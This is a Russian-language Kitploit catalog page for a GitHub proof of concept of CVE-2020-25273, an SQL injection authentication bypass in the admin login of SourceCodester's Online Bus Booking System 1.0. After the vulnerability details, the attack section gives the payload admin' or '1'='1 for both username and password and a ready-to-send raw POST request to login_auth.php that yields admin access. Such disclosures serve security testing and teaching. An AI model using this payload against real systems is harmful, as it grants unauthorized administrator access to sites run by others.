Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-25273 — Онлайн-система бронирования автобусов 1.0, существует обход аутентификации на экране входа администратора в admin.php через SQL-инъекцию в имени пользователя или пароле. | Kitploit
Инструменты/GitHubGitHub/jonathanrey87/cve-2020-25273
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеАутентификацияОбучение и Образование
GitHubjonathanrey87/cve-2020-25273

CVE-2020-25273

Онлайн-система бронирования автобусов 1.0, существует обход аутентификации на экране входа администратора в admin.php через SQL-инъекцию в имени пользователя или пароле.

Репозиторий
5 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-25273

Online Bus Booking System 1.0, присутствует обход аутентификации на экране входа администратора в admin.php через SQL-инъекцию в имени пользователя или пароле.

#Поставщик - SourceCodester

#Продукт - https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Тип уязвимости - Обход аутентификации

#Затронутый компонент - bus_booking/admin.php

#Тип атаки - Локальная

#Повышение привилегий - true

#Воздействие: выполнение кода - true

Вектор атаки

  1. Перейдите на панель входа администратора и попробуйте обойти

  2. В payload запроса укажите

    username : admin' or '1'='1

    password : admin' or '1'='1


POST /bus_booking/login_auth.php HTTP/1.1

Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0

username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1


Успешный вход в панель администратора

Скачать инструмент